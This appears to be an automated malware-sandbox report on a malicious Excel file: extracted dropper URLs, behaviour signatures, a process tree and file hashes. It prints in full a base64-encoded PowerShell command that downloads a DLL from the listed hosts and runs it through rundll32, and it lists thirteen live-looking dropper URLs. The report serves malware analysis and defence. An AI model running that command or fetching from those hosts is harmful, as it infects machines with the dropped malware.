Analysis

  • max time kernel
    47s
  • max time network
    36s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 21:11

General

  • Target

    986a28cc6b6165931375401925849e4182df92e8468fadfca7695d70f49a8213.xls

  • Size

    122KB

  • MD5

    2136126af329fdbbe2daa91c818cf987

  • SHA1

    dea8921d1758aacb5a55d804280a8f0f089278ff

  • SHA256

    986a28cc6b6165931375401925849e4182df92e8468fadfca7695d70f49a8213

  • SHA512

    2d264fa369b07ab69c8843502b1e6adaf2a8dfd4f85cafb6f58893761895bf6546e25729d5e6a149b3787f3cc4f0c22e82867c1468223d8944757dd4ab585d4d

  • SSDEEP

    3072:YOehv7q2Pjx45uoDGTj+5xtekEvi8/dgZBFoTLTmxW5WxVe+41WsdiXUchlL:xehv7q2Pjx45uoDGTj+5xtFEvi8/dgZ3

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://midnightsilvercrafters.com/store/wBjNOUw/

exe.dropper

http://tempral.com/NATE_05_22_2009/BI710N4cQ6R3/

exe.dropper

https://redington.karmatechmediaworks.com/wp-content/3JVuVx7QUM/

exe.dropper

https://uhc.karmatechmediaworks.com/wp-content/0EqfdeznntlOpaIP2Qv/

exe.dropper

https://servilogic.net/b/14hqrdyP0Z3WsbQib8/

exe.dropper

https://comezmuhendislik.com/ljfrmm/VTpHRFWoORAHnRQ3aQL/

exe.dropper

http://webmail.glemedical.com/wp-content/J1M2xxodH/

exe.dropper

http://toto.karmatechmediaworks.com/wp-content/i826vbcVgRJ/

exe.dropper

https://golfpia.karmatechmediaworks.com/wp-content/oEicpDnEkk/

exe.dropper

https://fortiuspharma.com/y6krss/EGm347cqj5/

exe.dropper

https://garyjharris.com/cgi-bin/0hH/

exe.dropper

https://vietnam.karmatechmediaworks.com/wp-content/PfSVQagusZy7AaMw/

exe.dropper

https://vinculinc.karmatechmediaworks.com/wp-content/VlcOPPwgidWlXDJNs6/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\986a28cc6b6165931375401925849e4182df92e8468fadfca7695d70f49a8213.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3772
    • C:\Windows\SYSTEM32\wscript.exe
      wscript c:\programdata\oue4hjld.vbs
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2924
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\programdata\bhnasleil.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2444
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -enc JABNAEoAWABkAGYAcwBoAEQAcgBmAEcAWgBzAGUAcwA0AD0AIgBoAHQAdABwADoALwAvAG0AaQBkAG4AaQBnAGgAdABzAGkAbAB2AGUAcgBjAHIAYQBmAHQAZQByAHMALgBjAG8AbQAvAHMAdABvAHIAZQAvAHcAQgBqAE4ATwBVAHcALwAsAGgAdAB0AHAAOgAvAC8AdABlAG0AcAByAGEAbAAuAGMAbwBtAC8ATgBBAFQARQBfADAANQBfADIAMgBfADIAMAAwADkALwBCAEkANwAxADAATgA0AGMAUQA2AFIAMwAvACwAaAB0AHQAcABzADoALwAvAHIAZQBkAGkAbgBnAHQAbwBuAC4AawBhAHIAbQBhAHQAZQBjAGgAbQBlAGQAaQBhAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMASgBWAHUAVgB4ADcAUQBVAE0ALwAsAGgAdAB0AHAAcwA6AC8ALwB1AGgAYwAuAGsAYQByAG0AYQB0AGUAYwBoAG0AZQBkAGkAYQB3AG8AcgBrAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwAwAEUAcQBmAGQAZQB6AG4AbgB0AGwATwBwAGEASQBQADIAUQB2AC8ALABoAHQAdABwAHMAOgAvAC8AcwBlAHIAdgBpAGwAbwBnAGkAYwAuAG4AZQB0AC8AYgAvADEANABoAHEAcgBkAHkAUAAwAFoAMwBXAHMAYgBRAGkAYgA4AC8ALABoAHQAdABwAHMAOgAvAC8AYwBvAG0AZQB6AG0AdQBoAGUAbgBkAGkAcwBsAGkAawAuAGMAbwBtAC8AbABqAGYAcgBtAG0ALwBWAFQAcABIAFIARgBXAG8ATwBSAEEASABuAFIAUQAzAGEAUQBMAC8ALABoAHQAdABwADoALwAvAHcAZQBiAG0AYQBpAGwALgBnAGwAZQBtAGUAZABpAGMAYQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ASgAxAE0AMgB4AHgAbwBkAEgALwAsAGgAdAB0AHAAOgAvAC8AdABvAHQAbwAuAGsAYQByAG0AYQB0AGUAYwBoAG0AZQBkAGkAYQB3AG8AcgBrAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBpADgAMgA2AHYAYgBjAFYAZwBSAEoALwAsAGgAdAB0AHAAcwA6AC8ALwBnAG8AbABmAHAAaQBhAC4AawBhAHIAbQBhAHQAZQBjAGgAbQBlAGQAaQBhAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG8ARQBpAGMAcABEAG4ARQBrAGsALwAsAGgAdAB0AHAAcwA6AC8ALwBmAG8AcgB0AGkAdQBzAHAAaABhAHIAbQBhAC4AYwBvAG0ALwB5ADYAawByAHMAcwAvAEUARwBtADMANAA3AGMAcQBqADUALwAsAGgAdAB0AHAAcwA6AC8ALwBnAGEAcgB5AGoAaABhAHIAcgBpAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwAwAGgASAAvACwAaAB0AHQAcABzADoALwAvAHYAaQBlAHQAbgBhAG0ALgBrAGEAcgBtAGEAdABlAGMAaABtAGUAZABpAGEAdwBvAHIAawBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUABmAFMAVgBRAGEAZwB1AHMAWgB5ADcAQQBhAE0AdwAvACwAaAB0AHQAcABzADoALwAvAHYAaQBuAGMAdQBsAGkAbgBjAC4AawBhAHIAbQBhAHQAZQBjAGgAbQBlAGQAaQBhAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAbABjAE8AUABQAHcAZwBpAGQAVwBsAFgARABKAE4AcwA2AC8AIgAuAHMAUABMAEkAdAAoACIALAAiACkAOwAgAGYAbwBSAGUAQQBDAGgAKAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAGkATgAgACQATQBKAFgAZABmAHMAaABEAHIAZgBHAFoAcwBlAHMANAApAHsAJABHAHcAZQBZAEgANQA3AHMAZQBkAHMAdwBkAD0AKAAiAGMAaQB1AHcAZAA6AGkAdQB3AGQAXABwAHIAaQB1AHcAZABvAGcAaQB1AHcAZAByAGEAbQBpAHUAdwBkAGQAYQB0AGkAdQB3AGQAYQBcAHYAeABjAGoAawBmAGgAZAAuAGQAaQB1AHcAZABsAGkAdQB3AGQAbAAiACkALgByAGUAUABsAEEAQwBlACgAIgBpAHUAdwBkACIALAAiACIAKQA7AGkAbgBWAE8AawBlAC0AdwBlAEIAcgBFAHEAVQBlAHMAVAAgAC0AdQBSAEkAIAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAC0AbwBVAHQARgBJAGwAZQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAA7AGkARgAoAHQAZQBTAHQALQBwAEEAVABoACAAJABHAHcAZQBZAEgANQA3AHMAZQBkAHMAdwBkACkAewBpAGYAKAAoAGcARQB0AC0AaQB0AEUAbQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAApAC4AbABlAE4ARwB0AGgAIAAtAGcAZQAgADQANwA0ADMANgApAHsAYgBSAGUAYQBrADsAfQB9AH0A
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1912
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vxcjkfhd.dll,ganw4ls
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2184
        • \??\c:\windows\syswow64\rundll32.exe
          c:\windows\syswow64\rundll32.exe c:\programdata\vxcjkfhd.dll,ganw4ls
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1140

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m0w5g43k.ljw.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

    Filesize

    1KB

    MD5

    526f526f851c30c292426bd4cc5e368f

    SHA1

    9023b0c186d6864ce306fcce797d249513fd3e6b

    SHA256

    737e55e0a612a9b1435022d45f2c73fd985e16f41d75ba6b43776796f028e8f4

    SHA512

    6917054373ab4bc9ae68a7fb83a8dd006192f75dd5dfc7d2d13ac00f788c0985a3ae6fbe808b90b1c06dc1cf25bcb7db500ff7ad2439ca7dd3e6e846e8580523

  • C:\programdata\bhnasleil.bat

    Filesize

    3KB

    MD5

    0f96848827a2960f874bcf613ce1e72c

    SHA1

    d936a765910adaf627fc6459716847fd87595ea2

    SHA256

    9e9915a1e009b7a9283629e5a1a66604915030b445c1f266914955299563473e

    SHA512

    00f04d42d544c0564ca4d435fbc0803ebcd8eabaa45abc852b449beffb4f3701681b8c908f580640e71686255c83aa698f10ea75a51dd0bf76c177132e86b862

  • \??\c:\programdata\oue4hjld.vbs

    Filesize

    604B

    MD5

    a0e5c8b0ad3da42bf6952871a41bf5e8

    SHA1

    cd2106ebaf43d596057457e87cf4c8482e246005

    SHA256

    5c3d66e2d33dfb51c691010af5d0a87250aa475235b537a336c607ade93a881a

    SHA512

    c685cc80c128087b6711ab65c7a0f2c63f55dfbab8577aea20d668112f77a0e69e7e350ff314201e93b8ef79f72764c79fc20e903c1a1f973e37ae3a873ff725

  • memory/1912-191-0x0000015251580000-0x0000015251680000-memory.dmp

    Filesize

    1024KB

  • memory/1912-170-0x0000015251A80000-0x0000015252226000-memory.dmp

    Filesize

    7.6MB

  • memory/1912-168-0x0000015238CC0000-0x0000015238CE2000-memory.dmp

    Filesize

    136KB

  • memory/3772-8-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-143-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-1-0x00007FFDF0E4D000-0x00007FFDF0E4E000-memory.dmp

    Filesize

    4KB

  • memory/3772-12-0x00007FFDAECD0000-0x00007FFDAECE0000-memory.dmp

    Filesize

    64KB

  • memory/3772-7-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-13-0x00007FFDAECD0000-0x00007FFDAECE0000-memory.dmp

    Filesize

    64KB

  • memory/3772-6-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-15-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-16-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-18-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-17-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-14-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-20-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-51-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-113-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-10-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-139-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-11-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-9-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-2-0x00007FFDB0E30000-0x00007FFDB0E40000-memory.dmp

    Filesize

    64KB

  • memory/3772-3-0x00007FFDB0E30000-0x00007FFDB0E40000-memory.dmp

    Filesize

    64KB

  • memory/3772-169-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-4-0x00007FFDB0E30000-0x00007FFDB0E40000-memory.dmp

    Filesize

    64KB

  • memory/3772-171-0x00007FFDF0E4D000-0x00007FFDF0E4E000-memory.dmp

    Filesize

    4KB

  • memory/3772-172-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-180-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-184-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-185-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-189-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-190-0x00007FFDF0DB0000-0x00007FFDF0FA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-5-0x00007FFDB0E30000-0x00007FFDB0E40000-memory.dmp

    Filesize

    64KB

  • memory/3772-0-0x00007FFDB0E30000-0x00007FFDB0E40000-memory.dmp

    Filesize

    64KB